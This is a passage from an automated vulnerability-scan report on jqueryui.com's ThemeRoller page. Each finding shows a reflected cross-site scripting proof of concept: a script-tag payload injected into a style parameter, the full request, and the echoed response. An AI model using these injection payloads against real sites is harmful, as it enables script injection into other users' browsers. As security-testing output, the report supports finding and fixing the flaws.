light=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png882e1"><script>alert(1)</script>07149fc06f1&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

3.32. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5322d"><script>alert(1)</script>f5d91b6353c was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png5322d"><script>alert(1)</script>f5d91b6353c&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png5322d"><script>alert(1)</script>f5d91b6353c&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

3.33. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 537a5"><script>alert(1)</script>3b59a1d1c81 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png537a5"><script>alert(1)</script>3b59a1d1c81&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png537a5"><script>alert(1)</script>3b59a1d1c81&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

3.34. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe15"><script>alert(1)</script>b095b5c9bc8 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngffe15"><script>alert(1)</script>b095b5c9bc8&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngffe15"><script>alert(1)</script>b095b5c9bc8&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

3.35. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bee3"><script>alert(1)</script>07f42324772 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png8bee3"><script>alert(1)</script>07f42324772&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png8bee3"><script>alert(1)</script>07f42324772&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

3.36. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2587"><script>alert(1)</script>912a8c95f83 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pngd2587"><script>alert(1)</script>912a8c95f83&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pngd2587"><script>alert(1)</script>912a8c95f83&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

3.37. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ef80"><script>alert(1)</script>7d60f528328 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png1ef80"><script>alert(1)</script>7d60f528328&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png1ef80"><script>alert(1)</script>7d60f528328&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

3.38. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1081b"><script>alert(1)</script>32da48d3a73 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png1081b"><script>alert(1)</script>32da48d3a73&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png1081b"><script>alert(1)</script>32da48d3a73&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

3.39. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e3d"><script>alert(1)</script>e48f9fe676e was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngf0e3d"><script>alert(1)</script>e48f9fe676e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngf0e3d"><script>alert(1)</script>e48f9fe676e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.40. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65cd7"><script>alert(1)</script>fc8cfd864d1 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa65cd7"><script>alert(1)</script>fc8cfd864d1&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
